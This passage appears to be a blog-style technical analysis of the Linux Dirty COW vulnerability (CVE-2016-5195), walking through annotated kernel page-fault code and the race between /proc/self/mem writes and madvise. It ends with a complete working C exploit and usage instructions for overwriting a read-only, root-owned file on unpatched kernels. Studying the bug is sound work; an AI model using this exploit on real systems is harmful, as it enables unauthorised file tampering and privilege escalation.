                ret = get_gate_page(mm, start & PAGE_MASK,
                        gup_flags, &vma,
                        pages ? &pages[i] : NULL);
                if (ret)
                    return i ? : ret;
                page_mask = 0;
                goto next_page;
            }

            if (!vma || check_vma_flags(vma, gup_flags))
                return i ? : -EFAULT;
            if (is_vm_hugetlb_page(vma)) {
                i = follow_hugetlb_page(mm, vma, pages, vmas,
                        &start, &nr_pages, i,
                        gup_flags);
                continue;
            }
        }
retry:
        /*
         * If we have a pending SIGKILL, don't keep faulting pages and
         * potentially allocating memory.
         */
        if (unlikely(fatal_signal_pending(current)))
            return i ? i : -ERESTARTSYS;
        cond_resched();
        page = follow_page_mask(vma, start, foll_flags, &page_mask); // get the physical page (struct page) for the virtual address
        if (!page) { // failed, for one of two reasons:
            /*
             * (1) no corresponding physical page exists (no mapping to a
             *     physical page has been established yet)
             * (2) such a physical page exists, but we lack the required
             *     permission (e.g. the page is not writable)
             * In the COW flow, (1) is hit first, then (2).
             */
            int ret;
            ret = faultin_page(tsk, vma, start, &foll_flags,
                    nonblocking); // [core] handle the page fault
            switch (ret) {
            case 0:
                goto retry; // fault handled successfully; go back and retry the page lookup
            case -EFAULT:
            case -ENOMEM:
            case -EHWPOISON:
                return i ? i : ret;
            case -EBUSY:
                return i;
            case -ENOENT:
                goto next_page;
            }
            BUG();
        } else if (PTR_ERR(page) == -EEXIST) {
            /*
             * Proper page table entry exists, but no corresponding
             * struct page.
             */
            goto next_page;
        } else if (IS_ERR(page)) {
            return i ? i : PTR_ERR(page);
        }
        if (pages) {
            pages[i] = page;
            flush_anon_page(vma, page, start);
            flush_dcache_page(page);
            page_mask = 0;
        }
next_page:
        if (vmas) {
            vmas[i] = vma;
            page_mask = 0;
        }
        page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
        if (page_increm > nr_pages)
            page_increm = nr_pages;
        i += page_increm;
        start += page_increm * PAGE_SIZE;
        nr_pages -= page_increm;
    } while (nr_pages);
    return i;
}
EXPORT_SYMBOL(__get_user_pages);

Two key points of COW here:

  • As noted at the very beginning, mmap does not establish a mapping between the page and a physical page; it merely hands out virtual addresses. So at this point follow_page_mask returns NULL; since no page was obtained, faultin_page() is called next to resolve the fault and allocate a physical page
  • After faultin_page successfully resolves the fault, control returns to the retry label and follow_page_mask is called again; if the current process has no write permission for the page, it still returns NULL, and since no page was obtained, faultin_page is called again to resolve the fault, this time performing copy-on-write

faultin_page

static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
        unsigned long address, unsigned int *flags, int *nonblocking)
{
    struct mm_struct *mm = vma->vm_mm;
    unsigned int fault_flags = 0;
    int ret;

    /* mlock all present pages, but do not fault in new pages */
    if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
        return -ENOENT;
    /* For mm_populate(), just skip the stack guard page. */
    if ((*flags & FOLL_POPULATE) &&
            (stack_guard_page_start(vma, address) ||
             stack_guard_page_end(vma, address + PAGE_SIZE)))
        return -ENOENT;
    if (*flags & FOLL_WRITE) // present because we intend to write to the page
        fault_flags |= FAULT_FLAG_WRITE;
    if (*flags & FOLL_REMOTE)
        fault_flags |= FAULT_FLAG_REMOTE;
    if (nonblocking)
        fault_flags |= FAULT_FLAG_ALLOW_RETRY;
    if (*flags & FOLL_NOWAIT)
        fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
    if (*flags & FOLL_TRIED) {
        VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
        fault_flags |= FAULT_FLAG_TRIED;
    }

    ret = handle_mm_fault(mm, vma, address, fault_flags); // page fault handling
    if (ret & VM_FAULT_ERROR) {
        if (ret & VM_FAULT_OOM)
            return -ENOMEM;
        if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
            return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
        if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
            return -EFAULT;
        BUG();
    }

    if (tsk) {
        if (ret & VM_FAULT_MAJOR)
            tsk->maj_flt++;
        else
            tsk->min_flt++;
    }

    if (ret & VM_FAULT_RETRY) {
        if (nonblocking)
            *nonblocking = 0;
        return -EBUSY;
    }

    /*
     * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
     * necessary, even if maybe_mkwrite decided not to set pte_write. We
     * can thus safely do subsequent page lookups as if they were reads.
     * But only do so when looping for pte_write is futile: in some cases
     * userspace may also be wanting to write to the gotten user page,
     * which a read fault here might prevent (a readonly page might get
     * reCOWed by userspace write).
     */
    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) // the second fault reaches here and clears the FOLL_WRITE bit
        *flags &= ~FOLL_WRITE;
    return 0;
}

The First Page Fault

On the first call to follow_page_mask, the page table entry (and the page table itself) is empty, so it returns NULL and we enter faultin_page for fault handling. That eventually calls do_cow_fault, which returns 0, so follow_page_mask is executed once more.

The Second Page Fault

Since we have no write permission for the page, follow_page_mask still returns NULL and the fault is triggered again, so we re-enter faultin_page. This time a writable page has been produced, and faultin_page clears the FOLL_WRITE bit in foll_flags.

The flow then returns to the retry label in __get_user_pages for a third attempt at fetching the page. The FOLL_WRITE bit in foll_flags is now gone, so the kernel treats the access as a read and follow_page_mask obtains the page successfully; what follows is the regular write path, and COW is complete.

Vulnerability Analysis

When writing to /proc/self/mem as described above, the overall flow is roughly:

/*
mem_rw
    __get_free_page
    ......
    __access_remote_vm
        ......
        __get_user_pages
            follow_page_mask ==> look up the target page
            faultin_page ==> handle the page fault
                handle_mm_fault ==> the page fault handling flow analyzed above
*/

On the first call to follow_page_mask, the page table entry is empty, so it returns NULL and we enter faultin_page for fault handling, eventually reaching do_cow_fault; it returns 0, so follow_page_mask runs again.

On the second call to follow_page_mask, the page table mapping, pte and so on have all been filled in (see the do_cow_fault analysis above). But the page table flags make the page read-only while we want to write, so NULL is returned again and we re-enter faultin_page. This ends up in do_wp_page, which reuses the page allocated by do_cow_fault and clears the FOLL_WRITE bit in foll_flags.

On the third call to follow_page_mask, the FOLL_WRITE bit has been cleared, so the request amounts to a read and the page is fetched; the user's subsequent write therefore lands in the private copy and is never synced back to disk.

But if, between the second and third passes, another thread calls madvise(addr, len, MADV_DONTNEED) to tell the kernel the page is no longer needed, then the third pass goes through follow_page_mask->faultin_page->follow_page_mask again, and this time the page cache page itself is returned (a small demo of MADV_DONTNEED's effect on a private mapping follows).
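The effect of madvise(MADV_DONTNEED) on a private mapping can be seen in isolation with a minimal sketch of mine (demo.txt is again a made-up scratch file): dropping the COW copy clears the pte, and the next access repopulates the mapping from the page cache:

#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    int fd = open("demo.txt", O_RDWR | O_CREAT | O_TRUNC, 0644);
    write(fd, "disk", 4);

    char *p = mmap(NULL, 4, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    p[0] = 'D';                         /* COW: private anonymous copy */
    printf("after write  : %.4s\n", p); /* "Disk" */

    madvise(p, 4, MADV_DONTNEED);       /* drop the copy, clear the pte */
    printf("after madvise: %.4s\n", p); /* "disk" again, from the page cache */
    return 0;
}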

The normal call flow is roughly:

/*
follow_page_mask()        // the page is unmapped: handle via faultin_page
    👇
faultin_page()            // ends up in do_cow_fault, creating an anonymous page (nothing is written yet)
    👇
follow_page_mask()        // the access flags carry FOLL_WRITE but the anonymous page is read-only; permission mismatch: handle via faultin_page
    👇
faultin_page()            // ends up in do_wp_page, reusing the anonymous page above and removing the FOLL_WRITE flag from flags
    👇
follow_page_mask()        // without FOLL_WRITE the permission check passes and the anonymous page is obtained
    👇
return to the caller 👉 kmap, then the data is written; the write targets the anonymous page and does not affect the data in the page cache
*/

The dirtycow call flow:

/*
follow_page_mask()        // the page is unmapped: handle via faultin_page
    👇
faultin_page()            // ends up in do_cow_fault, creating an anonymous page (nothing is written yet)
    👇
follow_page_mask()        // the access flags carry FOLL_WRITE but the anonymous page is read-only; permission mismatch: handle via faultin_page
    👇
faultin_page()            // ends up in do_wp_page, reusing the anonymous page above and removing the FOLL_WRITE flag from flags
    👇👉👉👉👉👉 // race: madvise tells the kernel the anonymous page above has been released, i.e. its pte has been cleared
follow_page_mask()        // so the page is found unmapped once more: handle via faultin_page, but flags no longer carry FOLL_WRITE
    👇
faultin_page()            // without FOLL_WRITE this is treated as a read, so the page cache page is mapped in directly
    👇
follow_page_mask()        // the page cache page is returned
    👇
return to the caller 👉 kmap, then the data is written; this writes straight into the page cache, so the file on disk ends up modified
*/

Exploitation

This vulnerability is quite old and seems to be patched everywhere; I tried several kernel versions without success, so I will just record an exploit here.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/stat.h>

void* map;

void usage()
{
    puts("usage: ./exp dest_file dirty_data");
    exit(-1);
}

void* write_func(void* args)
{
    int fd = open("/proc/self/mem", O_RDWR);
    for (int i = 0; i < 0x100000; i++)
    {
        /* seek to the private mapping and write to it through /proc/self/mem */
        lseek(fd, (off_t)map, SEEK_SET);
        write(fd, args, strlen(args));
    }
    return NULL;
}

void* madvise_func(void* args)
{
    for (int i = 0; i < 0x100000; i++)
    {
        /* the race: keep discarding the anonymous COW copy */
        madvise(map, 0x100, MADV_DONTNEED);
    }
    return NULL;
}

int main(int argc, char** argv, char** env)
{
    if (argc < 3) usage();
    pthread_t write_thr, madvise_thr;
    struct stat dest_st;
    int dest_fd;
    dest_fd = open(argv[1], O_RDONLY);
    fstat(dest_fd, &dest_st);
    map = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);

    pthread_create(&madvise_thr, NULL, madvise_func, NULL);
    pthread_create(&write_thr, NULL, write_func, argv[2]);

    pthread_join(write_thr, NULL);
    pthread_join(madvise_thr, NULL);
    return 0;
}
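A usage sketch, assuming an unpatched kernel (the fix landed in the late-2016 stable updates): compile with gcc exp.c -o exp -pthread, pick a file you can read but not write (e.g. a root-owned file), and run ./exp that_file some_data; once the race between the write thread and the madvise thread is won, the data appears in the file despite the mapping being read-only and private.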

References

https://arttnba3.cn/2021/04/08/CVE-0X00-CVE-2016-5195/

https://blingblingxuanxuan.github.io/2023/05/02/230501-dirtycow-analysis/
